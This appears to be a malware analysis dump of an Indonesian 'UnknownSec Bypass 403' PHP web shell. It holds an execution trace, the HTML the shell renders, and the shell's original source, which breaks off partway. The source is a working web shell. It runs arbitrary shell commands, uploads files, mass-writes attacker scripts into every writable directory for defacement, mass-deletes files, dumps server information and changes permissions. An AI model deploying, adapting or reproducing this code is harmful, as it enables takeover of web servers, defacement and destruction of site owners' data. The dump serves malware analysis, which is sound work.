2 48 0 0.002955 526008 is_dir 0 /var/www/html/uploads/bypass403.phtml 644 1 '/var/www/html/uploads/prepend.php'
2 48 1 0.002969 526048
2 48 R FALSE
2 49 0 0.002982 525992 filemtime 0 /var/www/html/uploads/bypass403.phtml 675 1 '/var/www/html/uploads/.'
2 49 1 0.002997 526016
2 49 R 1676247902
2 50 0 0.003010 525928 date 0 /var/www/html/uploads/bypass403.phtml 675 2 'Y-m-d' 1676247902
2 50 1 0.003040 526256
2 50 R '2023-02-12'
1 A /var/www/html/uploads/bypass403.phtml 675 $ft = '2023-02-12'
2 51 0 0.003064 526232 is_file 0 /var/www/html/uploads/bypass403.phtml 676 1 '/var/www/html/uploads/.'
2 51 1 0.003077 526272
2 51 R FALSE
2 52 0 0.003090 526240 filemtime 0 /var/www/html/uploads/bypass403.phtml 675 1 '/var/www/html/uploads/..'
2 52 1 0.003105 526288
2 52 R 1676247901
2 53 0 0.003118 526192 date 0 /var/www/html/uploads/bypass403.phtml 675 2 'Y-m-d' 1676247901
2 53 1 0.003148 526520
2 53 R '2023-02-12'
1 A /var/www/html/uploads/bypass403.phtml 675 $ft = '2023-02-12'
2 54 0 0.003171 526248 is_file 0 /var/www/html/uploads/bypass403.phtml 676 1 '/var/www/html/uploads/..'
2 54 1 0.003184 526288
2 54 R FALSE
2 55 0 0.003197 526248 filemtime 0 /var/www/html/uploads/bypass403.phtml 675 1 '/var/www/html/uploads/.htaccess'
2 55 1 0.003212 526288
2 55 R 1676247902
2 56 0 0.003225 526192 date 0 /var/www/html/uploads/bypass403.phtml 675 2 'Y-m-d' 1676247902
2 56 1 0.003254 526520
2 56 R '2023-02-12'
1 A /var/www/html/uploads/bypass403.phtml 675 $ft = '2023-02-12'
2 57 0 0.003281 526248 is_file 0 /var/www/html/uploads/bypass403.phtml 676 1 '/var/www/html/uploads/.htaccess'
2 57 1 0.003294 526288
2 57 R TRUE
2 58 0 0.003307 526248 filesize 0 /var/www/html/uploads/bypass403.phtml 677 1 '/var/www/html/uploads/.htaccess'
2 58 1 0.003320 526288
2 58 R 64
1 A /var/www/html/uploads/bypass403.phtml 677 $s = 0.0625
2 59 0 0.003343 526192 round 0 /var/www/html/uploads/bypass403.phtml 678 2 0.0625 3
2 59 1 0.003356 526264
2 59 R 0.063
1 A /var/www/html/uploads/bypass403.phtml 678 $s = 0.063
1 A /var/www/html/uploads/bypass403.phtml 682 $s = '0.063 KB'
2 60 0 0.003392 526288 is_writable 0 /var/www/html/uploads/bypass403.phtml 690 1 '/var/www/html/uploads/.htaccess'
2 60 1 0.003408 526328
2 60 R FALSE
2 61 0 0.003422 526288 is_readable 0 /var/www/html/uploads/bypass403.phtml 691 1 '/var/www/html/uploads/.htaccess'
2 61 1 0.003437 526328
2 61 R TRUE
2 62 0 0.003450 526288 p 1 /var/www/html/uploads/bypass403.phtml 692 1 '/var/www/html/uploads/.htaccess'
3 63 0 0.003463 526288 fileperms 0 /var/www/html/uploads/bypass403.phtml 118 1 '/var/www/html/uploads/.htaccess'
3 63 1 0.003476 526328
3 63 R 33188
2 A /var/www/html/uploads/bypass403.phtml 118 $p = 33188
2 A /var/www/html/uploads/bypass403.phtml 124 $i = '-'
2 A /var/www/html/uploads/bypass403.phtml 136 $i .= 'r'
2 A /var/www/html/uploads/bypass403.phtml 137 $i .= 'w'
2 A /var/www/html/uploads/bypass403.phtml 140 $i .= '-'
2 A /var/www/html/uploads/bypass403.phtml 141 $i .= 'r'
2 A /var/www/html/uploads/bypass403.phtml 142 $i .= '-'
2 A /var/www/html/uploads/bypass403.phtml 145 $i .= '-'
2 A /var/www/html/uploads/bypass403.phtml 146 $i .= 'r'
2 A /var/www/html/uploads/bypass403.phtml 147 $i .= '-'
2 A /var/www/html/uploads/bypass403.phtml 150 $i .= '-'
2 62 1 0.003593 526328
2 62 R '-rw-r--r--'
2 64 0 0.003606 526288 is_writable 0 /var/www/html/uploads/bypass403.phtml 693 1 '/var/www/html/uploads/.htaccess'
2 64 1 0.003622 526328
2 64 R FALSE
2 65 0 0.003635 526288 is_readable 0 /var/www/html/uploads/bypass403.phtml 693 1 '/var/www/html/uploads/.htaccess'
2 65 1 0.003650 526328
2 65 R TRUE
2 66 0 0.003668 526408 filemtime 0 /var/www/html/uploads/bypass403.phtml 675 1 '/var/www/html/uploads/bypass403.phtml'
2 66 1 0.003684 526456
2 66 R 1676247902
2 67 0 0.003697 526352 date 0 /var/www/html/uploads/bypass403.phtml 675 2 'Y-m-d' 1676247902
2 67 1 0.003727 526680
2 67 R '2023-02-12'
1 A /var/www/html/uploads/bypass403.phtml 675 $ft = '2023-02-12'
2 68 0 0.003751 526416 is_file 0 /var/www/html/uploads/bypass403.phtml 676 1 '/var/www/html/uploads/bypass403.phtml'
2 68 1 0.003764 526456
2 68 R TRUE
2 69 0 0.003776 526416 filesize 0 /var/www/html/uploads/bypass403.phtml 677 1 '/var/www/html/uploads/bypass403.phtml'
2 69 1 0.003789 526456
2 69 R 21707
1 A /var/www/html/uploads/bypass403.phtml 677 $s = 21.1982421875
2 70 0 0.003813 526312 round 0 /var/www/html/uploads/bypass403.phtml 678 2 21.1982421875 3
2 70 1 0.003826 526384
2 70 R 21.198
1 A /var/www/html/uploads/bypass403.phtml 678 $s = 21.198
1 A /var/www/html/uploads/bypass403.phtml 682 $s = '21.198 KB'
2 71 0 0.003861 526416 is_writable 0 /var/www/html/uploads/bypass403.phtml 690 1 '/var/www/html/uploads/bypass403.phtml'
2 71 1 0.003877 526456
2 71 R FALSE
2 72 0 0.003890 526416 is_readable 0 /var/www/html/uploads/bypass403.phtml 691 1 '/var/www/html/uploads/bypass403.phtml'
2 72 1 0.003905 526456
2 72 R TRUE
2 73 0 0.003918 526416 p 1 /var/www/html/uploads/bypass403.phtml 692 1 '/var/www/html/uploads/bypass403.phtml'
3 74 0 0.003930 526416 fileperms 0 /var/www/html/uploads/bypass403.phtml 118 1 '/var/www/html/uploads/bypass403.phtml'
3 74 1 0.003942 526456
3 74 R 33204
2 A /var/www/html/uploads/bypass403.phtml 118 $p = 33204
2 A /var/www/html/uploads/bypass403.phtml 124 $i = '-'
2 A /var/www/html/uploads/bypass403.phtml 136 $i .= 'r'
2 A /var/www/html/uploads/bypass403.phtml 137 $i .= 'w'
2 A /var/www/html/uploads/bypass403.phtml 140 $i .= '-'
2 A /var/www/html/uploads/bypass403.phtml 141 $i .= 'r'
2 A /var/www/html/uploads/bypass403.phtml 142 $i .= 'w'
2 A /var/www/html/uploads/bypass403.phtml 145 $i .= '-'
2 A /var/www/html/uploads/bypass403.phtml 146 $i .= 'r'
2 A /var/www/html/uploads/bypass403.phtml 147 $i .= '-'
2 A /var/www/html/uploads/bypass403.phtml 150 $i .= '-'
2 73 1 0.004063 526456
2 73 R '-rw-rw-r--'
2 75 0 0.004076 526416 is_writable 0 /var/www/html/uploads/bypass403.phtml 693 1 '/var/www/html/uploads/bypass403.phtml'
2 75 1 0.004092 526456
2 75 R FALSE
2 76 0 0.004104 526416 is_readable 0 /var/www/html/uploads/bypass403.phtml 693 1 '/var/www/html/uploads/bypass403.phtml'
2 76 1 0.004119 526456
2 76 R TRUE
2 77 0 0.004132 526408 filemtime 0 /var/www/html/uploads/bypass403.phtml 675 1 '/var/www/html/uploads/data'
2 77 1 0.004147 526440
2 77 R 1676247902
2 78 0 0.004159 526344 date 0 /var/www/html/uploads/bypass403.phtml 675 2 'Y-m-d' 1676247902
2 78 1 0.004189 526672
2 78 R '2023-02-12'
1 A /var/www/html/uploads/bypass403.phtml 675 $ft = '2023-02-12'
2 79 0 0.004213 526400 is_file 0 /var/www/html/uploads/bypass403.phtml 676 1 '/var/www/html/uploads/data'
2 79 1 0.004226 526440
2 79 R FALSE
2 80 0 0.004239 526408 filemtime 0 /var/www/html/uploads/bypass403.phtml 675 1 '/var/www/html/uploads/prepend.php'
2 80 1 0.004254 526456
2 80 R 1676247902
2 81 0 0.004267 526352 date 0 /var/www/html/uploads/bypass403.phtml 675 2 'Y-m-d' 1676247902
2 81 1 0.004296 526680
2 81 R '2023-02-12'
1 A /var/www/html/uploads/bypass403.phtml 675 $ft = '2023-02-12'
2 82 0 0.004319 526416 is_file 0 /var/www/html/uploads/bypass403.phtml 676 1 '/var/www/html/uploads/prepend.php'
2 82 1 0.004333 526456
2 82 R TRUE
2 83 0 0.004345 526416 filesize 0 /var/www/html/uploads/bypass403.phtml 677 1 '/var/www/html/uploads/prepend.php'
2 83 1 0.004359 526456
2 83 R 57
1 A /var/www/html/uploads/bypass403.phtml 677 $s = 0.0556640625
2 84 0 0.004382 526312 round 0 /var/www/html/uploads/bypass403.phtml 678 2 0.0556640625 3
2 84 1 0.004395 526384
2 84 R 0.056
1 A /var/www/html/uploads/bypass403.phtml 678 $s = 0.056
1 A /var/www/html/uploads/bypass403.phtml 682 $s = '0.056 KB'
2 85 0 0.004430 526416 is_writable 0 /var/www/html/uploads/bypass403.phtml 690 1 '/var/www/html/uploads/prepend.php'
2 85 1 0.004446 526456
2 85 R FALSE
2 86 0 0.004458 526416 is_readable 0 /var/www/html/uploads/bypass403.phtml 691 1 '/var/www/html/uploads/prepend.php'
2 86 1 0.004474 526456
2 86 R TRUE
2 87 0 0.004487 526416 p 1 /var/www/html/uploads/bypass403.phtml 692 1 '/var/www/html/uploads/prepend.php'
3 88 0 0.004500 526416 fileperms 0 /var/www/html/uploads/bypass403.phtml 118 1 '/var/www/html/uploads/prepend.php'
3 88 1 0.004513 526456
3 88 R 33261
2 A /var/www/html/uploads/bypass403.phtml 118 $p = 33261
2 A /var/www/html/uploads/bypass403.phtml 124 $i = '-'
2 A /var/www/html/uploads/bypass403.phtml 136 $i .= 'r'
2 A /var/www/html/uploads/bypass403.phtml 137 $i .= 'w'
2 A /var/www/html/uploads/bypass403.phtml 140 $i .= 'x'
2 A /var/www/html/uploads/bypass403.phtml 141 $i .= 'r'
2 A /var/www/html/uploads/bypass403.phtml 142 $i .= '-'
2 A /var/www/html/uploads/bypass403.phtml 145 $i .= 'x'
2 A /var/www/html/uploads/bypass403.phtml 146 $i .= 'r'
2 A /var/www/html/uploads/bypass403.phtml 147 $i .= '-'
2 A /var/www/html/uploads/bypass403.phtml 150 $i .= 'x'
2 87 1 0.004629 526456
2 87 R '-rwxr-xr-x'
2 89 0 0.004643 526416 is_writable 0 /var/www/html/uploads/bypass403.phtml 693 1 '/var/www/html/uploads/prepend.php'
2 89 1 0.004658 526456
2 89 R FALSE
2 90 0 0.004672 526416 is_readable 0 /var/www/html/uploads/bypass403.phtml 693 1 '/var/www/html/uploads/prepend.php'
2 90 1 0.004687 526456
2 90 R TRUE
2 91 0 0.004700 526352 date 0 /var/www/html/uploads/bypass403.phtml 720 1 'Y'
2 91 1 0.004729 526640
2 91 R '2023'
1 3 1 0.004744 526352
0.004777 362656
TRACE END [2023-02-12 22:25:27.922707]
Generated HTML code
<html><head>
<meta name="author" content="UnknownSec">
<meta name="robots" content="NOINDEX, NOFOLLOW">
<title>localhost - UnknownSec 403</title>
<meta name="viewport" content="width=device-width, initial-scale=0.70, user-scalable=no">
<link rel="stylesheet" href="//unknownsec.ftp.sh/main/style.css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/limonte-sweetalert2/7.33.1/sweetalert2.min.js"></script>
</head>
<body class="bg-secondary text-light">
<div class="container-fluid">
<div class="py-3" id="main">
<div class="box shadow bg-dark p-4 rounded-3">
<a class="text-decoration-none text-light" href="/bypass403.PHP"><h4>UnknownSec Bypass <i class="bi bi-bug-fill"></i> 403</h4></a><i class="bi bi-hdd-rack"></i> : <a class="text-decoration-none text-light" href="?path=/">/</a><a class="text-decoration-none" href="?path=/var">var</a>/<a class="text-decoration-none" href="?path=/var/www">www</a>/<a class="text-decoration-none" href="?path=/var/www/html">html</a>/ [ <font color="green">drwxrwxrwx</font> ]
<div class="dropdown">
<button class="btn btn-outline-light dropdown-toggle btn-sm" type="button" id="dropdownMenuButton" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"><i class="bi bi-menu-down"></i> Menu</button>
<div class="dropdown-menu">
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=upload"><i class="bi bi-upload"></i> Upload</a>
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=depes"><i class="bi bi-exclamation-diamond"></i> Mass depes</a>
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=delete"><i class="bi bi-trash"></i> Mass delete</a>
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=cmd"><i class="bi bi-terminal"></i> Terminal</a>
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=info"><i class="bi bi-info-circle"></i> Info server</a>
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=about"><i class="bi bi-info"></i> About</a>
</div>
</div><div class="table-responsive">
<table class="table table-hover table-dark text-light">
<thead>
<tr>
<td class="text-center">Name</td>
<td class="text-center">Last edit</td>
<td class="text-center">Size</td>
<td class="text-center">Permission</td>
<td class="text-center">Options</td>
</tr>
</thead>
<tbody class="text-nowrap">
<tr>
<td><i class="bi bi-file-earmark-code-fill"></i><a class="text-decoration-none text-secondary" href="?filesrc=/var/www/html/beneri.se_malware_analysis&path=/var/www/html">beneri.se_malware_analysis</a></td>
<td><center>2023-02-12</center></td>
<td><center>0 KB</center></td>
<td><center>-rw-r--r--</center></td>
<td>
<form method="POST" action="?option&path=/var/www/html">
<div class="input-group mb-3 text-center">
<select class="form-select form-select-sm" name="opt">
<option selected="" disabled="">Select</option>
<option value="delete">Delete</option>
<option value="edit">Edit</option>
<option value="rename">Rename</option>
<option value="chmod">Chmod</option>
<option value="download">Download</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="beneri.se_malware_analysis">
<input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis">
<input class="btn btn-outline-light btn-sm" type="submit" value="Go">
</div></form>
</td>
</tr>
<tr>
<td><i class="bi bi-file-earmark-code-fill"></i><a class="text-decoration-none text-secondary" href="?filesrc=/var/www/html/bypass403.PHP&path=/var/www/html">bypass403.PHP</a></td>
<td><center>2023-02-12</center></td>
<td><center>21.198 KB</center></td>
<td><center>-rw-rw-r--</center></td>
<td>
<form method="POST" action="?option&path=/var/www/html">
<div class="input-group mb-3 text-center">
<select class="form-select form-select-sm" name="opt">
<option selected="" disabled="">Select</option>
<option value="delete">Delete</option>
<option value="edit">Edit</option>
<option value="rename">Rename</option>
<option value="chmod">Chmod</option>
<option value="download">Download</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="bypass403.PHP">
<input type="hidden" name="path" value="/var/www/html/bypass403.PHP">
<input class="btn btn-outline-light btn-sm" type="submit" value="Go">
</div></form>
</td>
</tr>
</tbody>
</table>
<div class="text-center">
<kbd>Copyright © 2023 - UnknownSec</kbd>
</div>
</div>
</div>
</div>
</div>
<script src="//code.jquery.com/jquery-3.3.1.slim.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"></script>
<script src="//stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>
</body></html>Original PHP code
<?php
/* ~ Mau recode? izin dulu, recode ga izin itu ga keren ajg
~ V.02
~ Thanks to all mem AnonSec Team and all friend.
~ Untuk beberapa tools gw ambil dari indoxploit, karena tidak semuanya gw otakin sendiri.
*/
set_time_limit(0);
error_reporting(0);
@ini_set('error_log',null);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
$▛ = 'UnknownSec';
$▘ = "<style>table{display:none;}</style>";
if(isset($_GET['option']) && $_POST['opt'] == 'download'){
header('Content-type: text/plain');
header('Content-Disposition: attachment; filename="'.$_POST['name'].'"');
echo(file_get_contents($_POST['path']));
exit();
}
if(get_magic_quotes_gpc()){
foreach($_POST as $key=>$value){
$_POST[$key] = stripslashes($value);
}
}
function ▟($dir,$p) {
if (isset($_GET['path'])) {
$▚ = $_GET['path'];
} else {
$▚ = getcwd();
}
if (is_writable($▚)) {
return "<font color='green'>".$p."</font>";
} else {
return "<font color='red'>".$p."</font>";
}
}
function dc($dir,$p) {
if (isset($_GET['path'])) {
$▚ = $_GET['path'];
} else {
$▚ = getcwd();
}
if (is_writable($▚)) {
return "<font color='green'>".$p."</font>";
} else {
return "<font color='red'>".$p."</font>";
}
}
function ip() {
$ipas = '';
if (getenv('HTTP_CLIENT_IP'))
$ipas = getenv('HTTP_CLIENT_IP');
else if(getenv('HTTP_X_FORWARDED_FOR'))
$ipas = getenv('HTTP_X_FORWARDED_FOR');
else if(getenv('HTTP_X_FORWARDED'))
$ipas = getenv('HTTP_X_FORWARDED');
else if(getenv('HTTP_FORWARDED_FOR'))
$ipas = getenv('HTTP_FORWARDED_FOR');
else if(getenv('HTTP_FORWARDED'))
$ipas = getenv('HTTP_FORWARDED');
else if(getenv('REMOTE_ADDR'))
$ipas = getenv('REMOTE_ADDR');
else
$ipas = 'IP tidak dikenali';
return $ipas;
}
function ekse() {
$cmd = "whoami";
$return = "";
$output = "";
$methodArray = array();
//exec()
$return = ""; $output = "";
exec($cmd, $output, $return);
if (strlen($output[0]) > 0 && $return == 0) {
$methodArray[] = "exec";
}
//shell_exec()
$return = ""; $output = "";
$output = shell_exec($cmd);
if (strlen($output) > 0) {
$methodArray[] = "shell_exec";
}
return $methodArray;
}
function ekseCMD($cmd, $method) {
if ($method == "") {
ob_start();
$methodArray = ekse();
ob_end_clean();
if (is_array($methodArray)) {
$method = $methodArray[0];
}
}
switch ($method) {
case "exec":
exec($cmd, $output);
var_dump($output);
break;
case "shell_exec":
echo shell_exec($cmd);
break;
}
}
$cmd = htmlspecialchars($_POST["cmd"]);
$method = htmlspecialchars($_POST["execCMD"]);
function p($file){
$p = fileperms($file);
if (($p & 0xC000) == 0xC000) {
$i = 's';
} elseif (($p & 0xA000) == 0xA000) {
$i = 'l';
} elseif (($p & 0x8000) == 0x8000) {
$i = '-';
} elseif (($p & 0x6000) == 0x6000) {
$i = 'b';
} elseif (($p & 0x4000) == 0x4000) {
$i = 'd';
} elseif (($p & 0x2000) == 0x2000) {
$i = 'c';
} elseif (($p & 0x1000) == 0x1000) {
$i = 'p';
} else {
$i = 'u';
}
$i .= (($p & 0x0100) ? 'r' : '-');
$i .= (($p & 0x0080) ? 'w' : '-');
$i .= (($p & 0x0040) ?
(($p & 0x0800) ? 's' : 'x' ) :
(($p & 0x0800) ? 'S' : '-'));
$i .= (($p & 0x0020) ? 'r' : '-');
$i .= (($p & 0x0010) ? 'w' : '-');
$i .= (($p & 0x0008) ?
(($p & 0x0400) ? 's' : 'x' ) :
(($p & 0x0400) ? 'S' : '-'));
$i .= (($p & 0x0004) ? 'r' : '-');
$i .= (($p & 0x0002) ? 'w' : '-');
$i .= (($p & 0x0001) ?
(($p & 0x0200) ? 't' : 'x' ) :
(($p & 0x0200) ? 'T' : '-'));
return $i;
exit();
}
echo "
<!DOCTYPE HTML>
<html>
<head>
<meta name='author' content='$▛'>
<meta name='robots' content='NOINDEX, NOFOLLOW'>
<title>".$_SERVER['HTTP_HOST']." - $▛ 403</title>
<meta name='viewport' content='width=device-width, initial-scale=0.70, user-scalable=no'>
<link rel='stylesheet' href='//unknownsec.ftp.sh/main/style.css'>
<script src='//maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js'></script>
<script src='//cdnjs.cloudflare.com/ajax/libs/limonte-sweetalert2/7.33.1/sweetalert2.min.js'></script>
</head>
<body class='bg-secondary text-light'>
<div class='container-fluid'>
<div class='py-3' id='main'>
<div class='box shadow bg-dark p-4 rounded-3'>
<a class='text-decoration-none text-light' href='".$_SERVER['PHP_SELF']."'><h4>$▛ Bypass <i class='bi bi-bug-fill'></i> 403</h4></a>";
if(isset($_GET['path'])){
$path = $_GET['path'];
}else{
$path = getcwd();
}
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);
foreach($paths as $id=>$pat){
if($pat == '' && $id == 0){
$a = true;
echo '<i class="bi bi-hdd-rack"></i> : <a class="text-decoration-none text-light" href="?path=/">/</a>';
continue;
}
if($pat == '') continue;
echo '<a class="text-decoration-none" href="?path=';
for($i=0;$i<=$id;$i++){
echo "$paths[$i]";
if($i != $id) echo "/";
}
echo '">'.$pat.'</a>/';
}
echo " [ ".▟($path, p($path))." ]";
echo "
<div class='dropdown'>
<button class='btn btn-outline-light dropdown-toggle btn-sm' type='button' id='dropdownMenuButton' data-toggle='dropdown' aria-haspopup='true' aria-expanded='false'><i class='bi bi-menu-down'></i> Menu</button>
<div class='dropdown-menu'>
<a class='dropdown-item' href='?path=$path&dir=$path&id=upload'><i class='bi bi-upload'></i> Upload</a>
<a class='dropdown-item' href='?path=$path&dir=$path&id=depes'><i class='bi bi-exclamation-diamond'></i> Mass depes</a>
<a class='dropdown-item' href='?path=$path&dir=$path&id=delete'><i class='bi bi-trash'></i> Mass delete</a>
<a class='dropdown-item' href='?path=$path&dir=$path&id=cmd'><i class='bi bi-terminal'></i> Terminal</a>
<a class='dropdown-item' href='?path=$path&dir=$path&id=info'><i class='bi bi-info-circle'></i> Info server</a>
<a class='dropdown-item' href='?path=$path&dir=$path&id=about'><i class='bi bi-info'></i> About</a></h5>
</div>
</div>";
// tools nya
if(isset($_GET['dir'])) {
$dir = $_GET['dir'];
chdir($dir);
} else {
$dir = getcwd();
}
$dir = str_replace("\\","/",$dir);
$scdir = explode("/", $dir);
for($i = 0; $i <= $c_dir; $i++) {
$scdir[$i];
if($i != $c_dir) {
}
elseif($_GET['id'] == 'depes'){
function mass_kabeh($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$▚ = $dirc.'/'.$namafile;
if($dirb === '.') {
file_put_contents($▚, $isi_script);
} elseif($dirb === '..') {
file_put_contents($▚, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo "[<font color=green>success</font>] $▚<br>";
file_put_contents($▚, $isi_script);
$▟ = mass_kabeh($dirc,$namafile,$isi_script);
}
}
}
}
}
}
function mass_biasa($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$▚ = $dirc.'/'.$namafile;
if($dirb === '.') {
file_put_contents($▚, $isi_script);
} elseif($dirb === '..') {
file_put_contents($▚, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo "[<font color=green>success</font>] $dirb/$namafile<br>";
file_put_contents($▚, $isi_script);
}
}
}
}
}
}
if($_POST['start']) {
if($_POST['tipe'] == 'massal') {
echo "<div style='margin: 5px auto; padding: 5px'>";
mass_kabeh($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
} elseif($_POST['tipe'] == 'biasa') {
echo "<div style='margin: 5px auto; padding: 5px'>";
mass_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
}
} else {
echo "<br />$▘
<form method='post'>
<b>Tipe:</b><br>
<div class='custom-control custom-switch'>
<input type='checkbox' id='customSwitch' class='custom-control-input' name='tipe' value='biasa'>
<label class='custom-control-label' for='customSwitch'>Biasa</label>
</div>
<div class='custom-control custom-switch'>
<input type='checkbox' id='customSwitch1' class='custom-control-input' name='tipe' value='massal'>
<label class='custom-control-label' for='customSwitch1'>Massal</label>
</div>
<b><i class='bi bi-folder'></i> Lokasi:</b>
<input class='form-control' type='text' name='d_dir' value='$dir' height='10'>
<b><i class='bi bi-file-earmark'></i> File name:</b>
<input class='form-control' type='text' name='d_file' placeholder='name file' height='10'>
<b><i class='bi bi-file-earmark'></i> Your script:</b>
<textarea class='form-control' rows='7' name='script' placeholder='your secript here'></textarea><br />
<input type='submit' name='start' value='Go' class='btn btn-outline-light'>
</form>";
}
}
elseif($_GET['id'] == 'info'){
$disfunc = @ini_get("disable_functions");
if (empty($disfunc)) {
$disfc = "<font color=green>NONE</font>";
} else {
$disfc = "<font color=red>$disfunc</font>";
}
if(!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=green>OFF</font>";
echo '<br />'.$▘.'
<div class="container">
<div class="card text-dark">
<div class="card-header">';
echo "<b>Uname: </b><font color=green>".php_uname()."</font><br />";
echo "<b>Software: </b><font color=green>".$_SERVER['SERVER_SOFTWARE']."</font><br />";
echo "<b>PHP version: </b><font color=green>".PHP_VERSION."</font> <b>PHP os:</b> <font color=green>".PHP_OS."</font><br />";
echo "<b>Server Ip: </b><font color=green>".gethostbyname($_SERVER['HTTP_HOST'])."</font><br />";
echo "<b>Your Ip: </b><font color=green>".ip()."</font><br />";
echo "<b>User: </b><font color=green>$user</font> ($uid) | <b>Group:</b> <font color=green>$group</font> ($gid)<br />";
echo "<b>Safe Mode: </b>$sm<br />";
echo "<kbd>Disable Function:</kbd><pre>$disfc</pre>";
echo '</div>
</div>
</div>';
}
elseif($_GET['id'] == 'about'){
echo '<br />'.$▘.'
<div class="container">
<div class="card text-dark">
<div class="card-header">';
echo "<img alt='AnonSec Team' class='img-thumbnail rounded mx-auto d-block' src='//unknownsec.ftp.sh/AnonSec.jpg' width='150px'>";
echo "<b>- About Me -</b><br />";
echo "Thanks bre dah pake shell nya, jika ada yang error silahkan hubungi email di bawah.<br />Greetz : <a href=''>{ AnonSec Team } - And You</a><br />My email: <a href='mailto:unknownsec1337@gmail.com'>unknownsec1337@gmail.com</a>";
echo '</div>
</div>
</div>';
}
elseif($_GET['id'] == 'cmd') {
echo "$▘<br>
<form method='POST'>
<div class='input-group mb-3'>
<input class='form-control' type='text' name='cmd' value='$cmd'>
<select class='bg-dark text-light form-control' name='execCMD'>
<option>$method</option>";
ob_start();
$methodArray = ekse();
ob_end_clean();
foreach ($methodArray as $value) {
echo "<option>$value</option>";
}
echo '</select>
</div>
</form>';
if($cmd == "") {
echo "
<div class='card text-dark'>
<div class='card-header'>
<pre>";
ekseCMD("whoami", $method);
echo '</pre>
</div>
</div>';
}else {
echo "
<div class='card text-dark'>
<div class='card-header'>
<pre><kbd>~$ ".$cmd."</kbd><br>";
ekseCMD($cmd, $method);
echo "</pre>
</div>
</div>";
}
}
elseif($_GET['id'] == 'upload'){
echo '<br />'.$▘.'
<form action="" method="post" enctype="multipart/form-data">
<div class="input-group mb-3 text-center">
<input type="file" class="form-control form-control-sm" name="file">
<button type="submit" class="btn btn-outline-light btn-sm">Submit</button>
</div>
</form>';
if(isset($_FILES['file'])){
if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success upload",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed upload",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
}
}
elseif($_GET['id'] == 'delete'){
function hapus_massal($dir,$namafile) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$▚ = $dirc.'/'.$namafile;
if($dirb === '.') {
if(file_exists("$dir/$namafile")) {
unlink("$dir/$namafile");
}
} elseif($dirb === '..') {
if(file_exists("".dirname($dir)."/$namafile")) {
unlink("".dirname($dir)."/$namafile");
}
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
if(file_exists($▚)) {
echo "[<font color=green>deleted</font>] $▚<br>";
unlink($▚);
$▟ = hapus_massal($dirc,$namafile);
}
}
}
}
}
}
}
if($_POST['start']) {
echo "<div style='margin: 5px auto; padding: 5px'>";
hapus_massal($_POST['d_dir'], $_POST['d_file']);
echo "</div>";
} else {
echo "<br />$▘
<form method='post'>
<b><i class='bi bi-folder'></i> Lokasi:</b>
<input class='form-control' type='text' name='d_dir' value='$dir' height='10'>
<b><i class='bi bi-file-earmark'></i> File name:</b>
<div class='input-group mb-3'>
<input class='form-control' type='text' name='d_file' placeholder='name file' height='10'><br>
<div class='input-group-append'>
<input class='btn btn-outline-light' type='submit' name='start' value='Go'>
</form>
</div>
</div>";
}
}
}
// akhir tools
if(isset($_GET['filesrc'])){
echo "<br><b>name : </b>".basename($_GET['filesrc']);"</br>";
echo '<textarea class="form-control" rows="7" readonly> '.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea><br />';
}
elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
echo '<br><b>name : </b>'.basename($_POST['path']);'</br>';
//Chmod
if($_POST['opt'] == 'chmod'){
if(isset($_POST['perm'])){
if(chmod($_POST['path'],$_POST['perm'])){
echo '
<script type="text/javascript">
Swal.fire(
"Success",
"Success Change Permission",
"success"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}else{
echo '
<script type="text/javascript">
Swal.fire(
"Opsss",
"Failed change permission",
"error"
).then((btnClick) => {if(btnClick){document.location.href="?path='.$path.'"}})</script>
';
}
}
echo '<form method="POST">
<div class="input-group mb-3">
<input class="form-control" name="perm" type="text" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'"/>
<input class="form-control" type="hidden" name="path" value="'.$_POST['path'].'">
